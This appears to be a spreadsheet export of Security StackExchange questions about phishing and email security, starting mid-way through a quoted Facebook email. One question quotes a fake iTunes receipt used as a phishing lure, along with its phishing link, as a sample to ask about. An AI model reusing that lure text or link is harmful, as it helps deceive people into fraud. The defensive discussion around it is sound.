 width=3D"100%" style=3D"border-collapse:collapse;"&amp;gt;&amp;lt;td =
 style=3D"padding:15px;"&amp;gt;&amp;lt;table cellspacing=3D"0" cellpadding=3D"0" =
 style=3D"border-collapse:collapse;width:100%;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"font-size:11px;font-family:LucidaGrande,tahoma,verdana,arial,sans=
 -serif;padding-bottom:10px;"&amp;gt;Hi Milo,&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"font-size:11px;font-family:LucidaGrande,tahoma,verdana,arial,sans=
 -serif;padding-top:10px;padding-bottom:10px;"&amp;gt;Facebook has changed from =
 credits to local currency. You have $2.30 in your account. You can &amp;lt;a =
 href=3D"/settings?tab=3Dpayments" =
 style=3D"color:#3b5998;text-decoration:none;"&amp;gt;review your balance&amp;lt;/a&amp;gt; or =
 use this money on apps or games in the &amp;lt;a href=3D"/appcenter" =
 style=3D"color:#3b5998;text-decoration:none;"&amp;gt;App =
 Center&amp;lt;/a&amp;gt;.&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td style=3D"font-size:11px;font-family:LucidaGra=
 nde,tahoma,verdana,arial,sans-serif;padding-top:10px;"&amp;gt;Thanks,&amp;lt;br /&amp;gt;The =
 Facebook Payments Team&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/c=
 enter&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"padding:0;width:100%;"&amp;gt;&amp;lt;table cellspacing=3D"0" cellpadding=3D"0" =
 width=3D"100%" style=3D"border-collapse:collapse;" =
 id=3D"footer_table"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td style=3D""&amp;gt;&amp;lt;center&amp;gt;&amp;lt;table cellspacing=3D"0" =
 cellpadding=3D"0" width=3D"610" =
 style=3D"border-collapse:collapse;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td style=3D""&amp;gt;&amp;lt;table =
 cellspacing=3D"0" cellpadding=3D"0" width=3D"610" border=3D"0" =
 id=3D"footer" style=3D"border-collapse:collapse;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"font-size:12px;font-family:Helvetica Neue,Helvetica,Lucida =
 Grande,tahoma,verdana,arial,sans-serif;padding:18px 0;border-left:none;bor=
 der-right:none;border-top:none;border-bottom:none;color:#6a7180;font-weigh=
 t:300;line-height:16px;text-align:center;border:none;"&amp;gt;This message was =
 sent to &amp;lt;a href=3D"mailto:myEmail&amp;amp;#064;gmail.com" =
 style=3D"color:#6a7180;text-decoration:none;font-family:Helvetica =
 Neue,Helvetica,Lucida Grande,tahoma,verdana,arial,sans-serif;font-weight:b=
 old;"&amp;gt;myEmail&amp;amp;#064;gmail.com&amp;lt;/a&amp;gt;. If you don&amp;amp;#039;t want to receive these =
 emails from Facebook in the future, please &amp;lt;a href=3D"https://www.facebook=
 .com/o.php?k=3DAS3FhR4P3qzdS6JW&amp;amp;amp;u=3D100000135460238&amp;amp;amp;mid=3Da409107G=
 5af3188d358eG0G28eG21014dad" =
 style=3D"color:#6a7180;text-decoration:none;font-family:Helvetica =
 Neue,Helvetica,Lucida =
 Grande,tahoma,verdana,arial,sans-serif;font-weight:bold;"&amp;gt;unsubscribe&amp;lt;/a&amp;gt;. =
 Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA =
 94303&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/center&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;=
 /tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;span style=3D"width:100%;"&amp;gt;&amp;lt;img =
 src=3D"https://www.facebook.com/email_open_log_pic.php?mid=3Da409107G5af31=
 88d358eG0G28eG21014dad" style=3D"border:0;width:1px;height:1px;" =
 /&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
 --b1_e97806d65a32ea0f70f0cadf5f5df3e6--
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;facebook&gt;</t>
  </si>
  <si>
    <t>Suspicious email with my information in it: what do i do?</t>
  </si>
  <si>
    <t>&lt;p&gt;I just received this email:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Billed To:
 d**********@****.NET
 John ******
 Order Number: M1V62***2711
 Receipt Date: 07/12/12
 Order Total: $699.99
 Billed To: Credit card
 Item Number Description Unit Price
 1 Postcard (View\Download ) 
 Cancel order Not your order?Report a Problem $699.99
 Subtotal: $699.99
 Tax: $0.00
 Order Total: $699.99
 Please retain for your records.
 Please See Below For Terms And Conditions Pertaining To This Order.
 Apple Inc.
 You can find the iTunes Store Terms of Sale and Sales Policies by launching your iTunes application and clicking on Terms of Sale or Sales Policies
 Answers to frequently asked questions regarding the iTunes Store can be found at http://www.apple.com/support/itunes/store/
 Apple ID Summary –ì—ì–í—û–ì—û–≤–Ç—ô–í¬¨–ì‚Äö–í—û Detailed invoice
 Apple respects your privacy.
 Copyright –ì—ì–≤–Ç—ô–ì‚Äö–í¬© 2011 Apple Inc. All rights reserved
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I removed some characters of course to protect my information. Heres the thing, i don't use a credit card for my iTunes, i ALWAYS just buy gift cards and use it that way. It has all of the logos and images usually associated with an apple email. The sender is &lt;code&gt;itunes@new.itunes.com&lt;/code&gt; my question is: is this a legitimate email or if i click on the links am i probably going to get taken for a ride? The thing is is that this email isn't even associated with my iTunes account, this is my work email. Whats the deal?&lt;/p&gt;
 &lt;p&gt;if this question is not on topic here, I'm fine with it getting migrated, I've never posted a question here and I'm not sure if it is within the scope of the site.&lt;/p&gt;
 &lt;h2&gt;EDIT&lt;/h2&gt;
 &lt;p&gt;I checked all of the links on the page and they all go to here: tomjames.comcastbiz.net/check.php&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;I contacted Apple support and this is what i got back:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;John, many customers have recently reported they received a similar email. I'll be glad to provide as much information as I can. I've looked into this for you and found that neither the email nor its sender are affiliated with Apple. The email appears to be a phishing attempt, designed to trick users into visiting a website. Fortunately, the purchase indicated in the email is not a real charge. I've checked your account to be certain.&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>Process of mail analysis</t>
  </si>
  <si>
    <t>&lt;p&gt;We've been receiving some pretty well executed spear phishing attempts, they know staff in specific depts and our MD's name. We use Claranet so raise an incident when these come through and they send the offending mail off to Symantec for analysis who 'flag it as spam'. &lt;/p&gt;
 &lt;p&gt;What analysis process happens to the mail and how are those results used to improve spam detection. I presume there's a little more to it than check headers and blacklist the sender&lt;/p&gt;</t>
  </si>
  <si>
    <t>Whitelisting only domain not IP</t>
  </si>
  <si>
    <t>&lt;p&gt;Is it possible to whitelist only 1 domain name but not IP?&lt;/p&gt;
 &lt;p&gt;For example:&lt;/p&gt;
 &lt;p&gt;On some &amp;quot;Doogle&amp;quot; hosting is IP 1.1.1.1 and have multiple domain resolution for this IP: dog.com, cat.com&lt;/p&gt;
 &lt;p&gt;cat.com generating phishing attempts, brute-forcing etc., but dog.com is legit.&lt;/p&gt;
 &lt;p&gt;Is it possible to whitelist only dog.com but all other domains will remain in block?&lt;/p&gt;
 &lt;p&gt;Thank you.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;firewalls&gt;</t>
  </si>
  <si>
    <t>Is Yahoo SignIn Seal effective at phishing prevention?</t>
  </si>
  <si>
    <t>&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="https://security.stackexchange.com/questions/19155/effectiveness-of-security-images"&gt;Effectiveness of Security Images&lt;/a&gt; &lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Information about the efficacy of Yahoo's &lt;a href="https://protect.login.yahoo.com/" rel="nofollow noreferrer"&gt;SignIn Seal&lt;/a&gt; is scarce, the best I could find was &lt;a href="http://en.wikipedia.org/wiki/Phishing#Augmenting_password_logins" rel="nofollow noreferrer"&gt;this section&lt;/a&gt; on Wikipedia's entry on Phishing, claiming that "few users refrain from entering their password when images are absent" and "this feature [...] is susceptible to other attacks" (which?). But even if users were attentitve to it, I'm having trouble wraping my head around the concept.&lt;/p&gt;
 &lt;p&gt;How does one ensure the seal will only be shown when the user is actually at that particular site? Looking at the source code from Yahoo's login page I see a myriad of techniques being used, but I find it hard to comprehend what are their purposes, and how they work together to achive its goal:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;JavaScript is used to check whether or not the page is in an &lt;code&gt;iframe&lt;/code&gt; (not showing the image if it is - or if JavaScript is disabled);&lt;/li&gt;
 &lt;li&gt;The inserted image has a long random-looking token in its &lt;code&gt;src&lt;/code&gt;, which I presume is to keep it secret;&lt;/li&gt;
 &lt;li&gt;The image url expires pretty quickly, so it can't be stolen and used somewhere else.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;What I could infer from the above:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;The login page request &lt;strong&gt;must&lt;/strong&gt; have been started from the user's browser, or else the cookie that holds the seal wouldn't be sent;
 &lt;ul&gt;
 &lt;li&gt;If the attacker puts the page in an &lt;code&gt;iframe&lt;/code&gt;, he can't access its contents due to same-origin policy.&lt;/li&gt;
 &lt;li&gt;Likewise, the attacker can't request it via Ajax, for the same reason.&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;li&gt;On request of the login page, the server prepares an unique URL to serve that image (using the contents of the cookie - the image is not permanently stored in the server), with an unguessable token that the attacker could not have access;&lt;/li&gt;
 &lt;li&gt;The image will only be displayed if the page successfully determines it is not in an &lt;code&gt;iframe&lt;/code&gt;; thus, if the user sees the image, he can be confident that the site is legit.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Is my reasoning correct? Are there any known attacks to this scheme? (maybe something involving MitM, etc)&lt;/p&gt;</t>
  </si>
  <si>
    <t>Can a phishing website use the original (HTTPS, TLS) certificate?</t>
  </si>
  <si>
    <t>&lt;p&gt;If one has a phishing website that uses the original certificate that was obtained by accessing that website, can an attack fool users to believe they are accessing legitimate websites?&lt;/p&gt;
 &lt;p&gt;If not, how will it get caught?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How can I filter out phishing e-mails containing malware using Gmail?</t>
  </si>
  <si>
    <t>&lt;p&gt;I use gmail, and about 3 weeks ago I started getting a couple e-mails a day from random sources. All of the e-mails contain gibberish text like this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; 6 5 4 8 2586 8016 70170
  2 1 08 05 60 172 01 5463412 5410
  the stinging did working interpret our Or fire sudden of they spurts
 our together of
  will they will worried be things as and take and stupid by lots
 arefat 4 3 0 643 4033 8 71054 2438264 46850
  8 6 4 8 8 87 3178 375345 560723 3
  fire the working interpret together of of Or spurts they sudden
 stinging our our did
  stupid lots will and will things be arefat worried take by and they
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;And the exact same named PDF attachment that I can only assume is malware:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/5KQEn.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/5KQEn.png" alt="pdf malware" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;The e-mails all come from different addresses and no matter how many times I report them, they come in twice a day. Is there someway I can get these filtered to my spam or trash folders in the least constraining way possible -- so people I know can still send me PDFs?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;gmail&gt;</t>
  </si>
  <si>
    <t>How do I protect myself from the aftermath of the OPM hack?</t>
  </si>
  <si>
    <t>&lt;p&gt;As a federal employee, I, along with some 4 million other Americans had our information compromised in the recent OPM (office of personal management) hack. Former and current addresses, names of friends and family, salary information, and maybe even social security numbers may have been compromised.
 What can I do to protect myself and others from the malicious use of my (and coworker's) info? While I know spear-phishing is a likely path anyone after more information may take, what are some other common attacks that follow hacks like this, and how do I recognize and defend against them?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;privacy&gt;&lt;phishing&gt;&lt;incident-response&gt;</t>
  </si>
  <si>
    <t>Access my website from google sends me to a scam page</t>
  </si>
  <si>
    <t>&lt;p&gt;When I type my web site's name in Google search, I see in the pages under the main URL are scam pages:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/giw2t.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/giw2t.png" alt="Screenchot google search ingo network"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;If I click the page, it goes to an ad page that I did not create:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/WlI2T.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/WlI2T.png" alt="Phishing page"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;If I refresh the page, I'm still on the phishing page.&lt;/p&gt;
 &lt;p&gt;However, if I copy/paste the URL from the phishing page to a new tab, it brings me to the normal page.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/7oAOp.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/7oAOp.png" alt="Normal page when access through URL"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Tested with Google Chrome.&lt;/p&gt;
 &lt;p&gt;What can be the mechanism behind this attack?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;google&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Are non-English speakers better protected from (international) phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;After I received dozen of spam mails over the last year with my thrashmail (used for "You must log in once to check out this product.."-Sites, etc.) I noticed they were mostly translated (if they are at all) horribly.&lt;/p&gt;
 &lt;p&gt;I thought about that after reading the Wikipedia article about the ransomware "Locky" where the Spam Message pattern was shown.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Dear (random name):&lt;/p&gt;
  &lt;p&gt;Please find attached our invoice for services rendered and additional
  disbursements in the above-mentioned matter.&lt;/p&gt;
  &lt;p&gt;Hoping the above to your satisfaction, we remain&lt;/p&gt;
  &lt;p&gt;Sincerely,
  (random name)
  (random title)&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Refering to my experience, only a few mails were translated well enough to even consider it as my native tongue (German, by the way).&lt;/p&gt;
 &lt;p&gt;So, I was wondering If non-English users are theoretically better protected from international scam/phishing than native speakers. Of course there are a lot of properly translated versions out there, or they are also based in the same country, but my inbox is dominated by non-German Spammers.&lt;/p&gt;
 &lt;p&gt;Or would you (as a 'normal' user) trust a [insert random title here] who can't properly speak your native language and therefore sounds like Master Yoda with Dyslexia? Or if it was in English I'd wonder "Why the heck would a [insert radnom country I've never heard of] Lawyer write to me in English?"&lt;/p&gt;
 &lt;p&gt;I believe these users are a bit safer, as Phishing is mostly about gaining the victim's trust.&lt;/p&gt;
 &lt;p&gt;I'm interested in whether this thesis is true.
 &lt;hr&gt;
 &lt;strong&gt;Edit&lt;/strong&gt;: It's awesome to see how multifarious the Answers and Comments are. Kudos to the Stack InfoSec Community.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;theory&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Secure UAC prompt</t>
  </si>
  <si>
    <t>&lt;p&gt;In &lt;a href="https://security.stackexchange.com/questions/162240/keepass-security-local-malware#comment309213_162241"&gt;this comment&lt;/a&gt; there is a comment mentioning a "secure UAC prompt" where the user can enter a password.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;KeePass actually does have systems in place to stop keyloggers (such
  as only allowing the master password to be entered in a secure UAC
  prompt on Windows)&lt;/p&gt;
  &lt;p&gt;[...]&lt;/p&gt;
  &lt;p&gt;it also wouldn't be impossible to produce a fake UAC prompt, even if it
  might not stand to close inspection&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;The only interaction I get (and I think this is true for most of the users as well) with Windows UAC is the system prompt about allowing an application to run or not. I've never heard about an application having its own UAC prompt.&lt;/p&gt;
 &lt;p&gt;So how does that look? What kind of security does it offer and what can I do as a user to protect myself from a phishing attempt?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;windows&gt;&lt;uac&gt;</t>
  </si>
  <si>
    <t>Does iPhone home button act as Secure Attention Key?</t>
  </si>
  <si>
    <t>&lt;p&gt;On an iPhone, does pressing the home button act as a &lt;a href="https://en.wikipedia.org/wiki/Secure_attention_key" rel="nofollow noreferrer"&gt;Secure Attention Sequence&lt;/a&gt;?&lt;/p&gt;
 &lt;p&gt;The home button is a physical button. You can press the home button whereever you are and go back to the home screen. Is this a secure, unspoofable way to get to the home screen? Is it adequate to serve as a Secure Attention Sequence?&lt;/p&gt;
 &lt;p&gt;On Windows, Ctrl-Alt-Del &lt;a href="https://security.stackexchange.com/q/34972/971"&gt;acts as a Secure Attention Key&lt;/a&gt;. Applications can't hook or intercept Ctrl-Alt-Del. Instead, a Ctrl-Alt-Del keypress event goes straight to the OS, which takes control of the UI and displays a trusted login screen. As a result, after pressing Ctrl-Alt-Del you can be sure you're interacting with the OS, not some malicious application that's trying to spoof you. I'm wondering if the home button on the iPhone has similar properties, or if there is any secure attention sequence that works for the iPhone.&lt;/p&gt;
 &lt;p&gt;For instance, if there was a way that an iOS app could "hook" home button presses, so that pressing the home button doesn't take you to the home screen but instead notifies the app and lets the app respond appropriately, then the home button would not be a Secure Attention Sequence: a malicious app could hook it, and when the user presses the home button, display a screen that looks exactly like the home screen but it is actually presented by the malicious app. However, I don't know enough about iOS to know whether those kinds of shenanigans are possible or not. So, is the home button a Secure Attention Key, on iOS?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;ios&gt;&lt;phishing&gt;&lt;spoofing&gt;</t>
  </si>
  <si>
    <t>IP addresses readily available on black market?</t>
  </si>
  <si>
    <t>&lt;p&gt;I know that criminals can readily find on the black market large dumps of password databases from hacked sites. These may contain the username, password, and email address for millions of users.&lt;/p&gt;
 &lt;p&gt;But what about IP addresses? Is it easy to find similar data sets that also contain, for each user, the last IP address that user used to log into the site? Or, to put it another way, is it easy for criminals to get their hands on a large database that lists, for many IP addresses, an email address for someone who might have recently used that IP address? By recent, I mean "in the past few years".&lt;/p&gt;
 &lt;p&gt;Suppose a criminal wants a large database that, for millions of users, has their email address and an IP address that user has recently used. (This would allow the criminal to do a lookup by IP address and retrieve an email address for a user who has used that IP address.) Is this readily available for sale on the criminal underground market? Or is this tough/expensive for criminals to come by?&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;Context: I'm trying to assess the plausibility of a hypothesis about how some people might be getting phished by a specific attack campaign. For these purposes, it would help to know whether it's easy for criminals to get their hands on large data sets that tell them not only usernames and passwords but also IP address information, or whether this information is not readily available to most garden-variety criminals. In other words, this is effectively a question about the economics of cybercrime: what is the cost to a criminal of obtaining a database of (emailaddr,ip_addr) records, compared to the cost of obtaining a database of (username,password,emailaddr) records?&lt;/p&gt;
 &lt;p&gt;I do know about NAT and dynamic IP address assignment and their implications for this situation.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;reconnaissance&gt;&lt;crime&gt;</t>
  </si>
  <si>
    <t>How did the email pass DKIM?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to figure out how this one phishing email (used our Company's domain as from) was able to bypass the O365 Spamfilter.&lt;/p&gt;
 &lt;p&gt;Looking at the Header it looks like they passed the DKIM even though the Domain that is used differs completely from the sender domain.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;smtp.mailfrom=contoso.com; dkim=pass (signature was verified)
 header.d=myprivategym.ae;dmarc=fail action=quarantine
 header.from=noser.ch;compauth=fail reason=000
 Received-SPF: Fail (protection.outlook.com: domain of contoso.com does not designate 162.240.0.182 as permitted sender) receiver=protection.outlook.com;
 client-ip=162.240.0.182; helo=5264291.stepup.ae;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;And here is the complete DKIM Signature:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed;
  d=myprivategym.ae; s=default; h=Content-Type:MIME-Version:Date:Subject:To:
  From:Reply-To:Message-ID:Sender:Cc:Content-Transfer-Encoding:Content-ID:
  Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc
  :Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Unsubscribe:
  List-Subscribe:List-Post:List-Owner:List-Archive;
  bh=suy1b+63b/U2RVJlwzBdnXUOlOuPf+shUSL9AwCk8Xw=; b=eUvt0Q7HjDXwECOgEc8cIWRMAEj8/0hQOvxyX8J2jZlVTwvupRc6x2v96MNDi8nuLw9/vPSenK20R5JoRFqoywTfycnpvIj0HBsfTwxihpJJlz98Y2YNYz1TEW/1OK1sIQ6tWUYore3TXFHFyin7hSbZKLCkiRdHT9UxGsd70WiFDTZH+hwubvNOytOMZHC0F9uxWaeaZc5AIp6ZB7rHcq4wdHmqWVQm04FCIrCyq/f7zUeCeKUhrRCgDKqFhGh/ZT/Ek5Yq5BL6E2p99X6LyCgGfDQ8IUvYHXLbVlUK1rllP1pnhzn/mBNvpo8fvXGAtS4K2+9TyrSKkZL8iPhy3A==;
 Received: from [74.208.177.107] (port=49903 helo=74.208.177.107)
  by 5264291.stepup.ae with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
  (Exim 4.94.2)
  (envelope-from test@contoso.com)
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;My DMARC DNS Records look like this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;quot;v=DMARC1; p=quarantine&amp;quot;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Do I have to add a Domain Alignment checker for SPF and DKIM to prevent this? Or is there any other reason that I am missing why the DKIM passed in this case?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;dkim&gt;&lt;dmarc&gt;</t>
  </si>
  <si>
    <t>What's the next step if an organization doesn't respond to warnings of a potential data breach?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've recently started getting a rash of junk mail to a particular email address. I give out unique addresses to all organizations I deal with, so I know exactly who has this address on file. The emails are not of a marketing nature (mostly phishing/work-from-home scams), so to me it appears that someone may have compromised at least a list of this organization's customer email addresses.&lt;/p&gt;
 &lt;p&gt;My attempts to inform the organization (an online retailer) that there may be a problem via all the channels I've been able to find have so far not elicited a response. I'm continuing to try, but if ultimately I can't get anyone at the organization to even acknowledge that I'm contacting them, what would be the next step to make sure someone is looking (or has looked) at this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;incident-response&gt;</t>
  </si>
  <si>
    <t>ElectricSignal</t>
  </si>
  <si>
    <t>Subdomains a possible defense against phishing</t>
  </si>
  <si>
    <t>Our domain being spoofed by email addresses to try and spear phish us - how to prevent</t>
  </si>
  <si>
    <t>&lt;p&gt;Ive been reviewing the emails blocked by our anti virus and have seen allot come from emile8@company.com (we dont have any users called this) with company.com being our domain, the emails all have the subject 'document request' and all according to our anti virus contain something (either trojan, virus, phishing etc..) &lt;/p&gt;
 &lt;p&gt;How can i prevent our domain being spoofed in this way ? &lt;/p&gt;
 &lt;p&gt;UPDATE: 
 We are using google apps for business email.
 We also have an old email server from before we moved to google apps but the mx record is no longer pointed here. (its just left up as a backup copy of old emails, not sure if its even relevant but thought id mention it in case it was)&lt;/p&gt;</t>
  </si>
  <si>
    <t>Passwordless website authentication scheme</t>
  </si>
  <si>
    <t>&lt;blockquote&gt;
 &lt;p&gt;Edit: This scheme has since been standardised as &lt;a href="https://webauthn.guide/" rel="nofollow noreferrer"&gt;WebAuthn&lt;/a&gt; - go use that instead!&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I have a userbase which &lt;em&gt;really&lt;/em&gt; isn't all that inclined to create a secure password for a website. They're also almost entirely on mobile devices, so I would like to try something a little different rather than them type 'password1' and just wait for it to get guessed. So, firstly, some assumptions:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Web browsers almost always remember the password for you anyway.&lt;/li&gt;
 &lt;li&gt;Mobile devices are increasingly gaining features which identify a particular user more securely (touch ID, for example).&lt;/li&gt;
 &lt;li&gt;This uses HTTPS; Malicious clients (intercepting) are largely a non-issue.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;The resulting implication:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;The website authenticates the device and the device authenticates the user. Therefore, we might as well use something better than a poorly chosen password for website &amp;lt;-&amp;gt; device.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Given this, the intention is to use a client generated key pair. The most similar thing asked before is &lt;a href="https://security.stackexchange.com/questions/94814/using-rsa-for-web-application-authentication"&gt;Using RSA for Web Application Authentication&lt;/a&gt;, however this approach appears to be a little different.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;So, the protocol itself. Firstly, the join process:&lt;/strong&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;The client generates an RSA key pair.&lt;/li&gt;
 &lt;li&gt;The public key is sent to the server (over HTTPS). This only ever happens once per device.&lt;/li&gt;
 &lt;li&gt;The server stores the public key as a device.&lt;/li&gt;
 &lt;li&gt;The server creates an account and relates the device to the account. [A]&lt;/li&gt;
 &lt;li&gt;The first session token along with the new device ID is encrypted using the public key, and the result is sent back to the client. The device ID is both a number and a randomly generated string.&lt;/li&gt;
 &lt;li&gt;The client decrypts it, stores the device ID and the private key, and sets the IP locked session token as its cookie.&lt;/li&gt;
 &lt;li&gt;All further requests are authenticated using the session token.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;strong&gt;Login (typically due to changed IP)&lt;/strong&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;The client tells the server which device it is by sending the device ID.&lt;/li&gt;
 &lt;li&gt;The server asks the client to prove it by encrypting the new session token with its stored public key of that device, and sending it.&lt;/li&gt;
 &lt;li&gt;The client decrypts the data and sets the session as it's cookie.&lt;/li&gt;
 &lt;li&gt;Provided it really is who it said it was, the session is now valid.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;strong&gt;Adding a device to an account (e.g. a new phone to replace the one you just washed):&lt;/strong&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;The device gets a device ID for itself by doing a join similar to above but does not create an account; [A] does not occur. The device is currently able to authenticate but is not associated with any account. (And this association is purely at the server end).&lt;/li&gt;
 &lt;li&gt;Enter your email address (or some other account related information such as a username) on the new device.&lt;/li&gt;
 &lt;li&gt;The server identifies the requested account and sends it an email or SMS containing a link.&lt;/li&gt;
 &lt;li&gt;The user loads the link (on any device). This causes the server to relate the new device to the original account, provided it's within e.g. 24 hours.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;strong&gt;Known vulnerabilities:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;The following vulnerabilities all also relate to your typical password system.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;It's as strong as the email account/ SMS receiver etc.&lt;/li&gt;
 &lt;li&gt;SSLStrip and XSS being used to grab the stored private key, in the same way they could grab document.cookie or the autofilled user/password fields. Although the whole site is HTTPS only, there may be some unknown exploit with the surrounding infrastructure.&lt;/li&gt;
 &lt;li&gt;Someone else could grab the physical device and use the site.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;strong&gt;Benefits over a password system:&lt;/strong&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;The 'password' is private, even from the server, helping against data leaks and MITM.&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;The 'password' text is considerably stronger as it's essentially equivalent to one in the region of 300-500 characters long.&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;The server only contains a list of public keys. Someone gaining this list via a data leak would still have to break RSA.&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;It's unphishable as the user never directly enters a password.&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;If an intruder breaks HTTPS, i.e. by going around it with something like SSLStrip, they'd still have to break the password as it's not then on the wire as clear text.&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Actually simpler to use; the user simply enters, at a minimum, an email address.&lt;/p&gt;
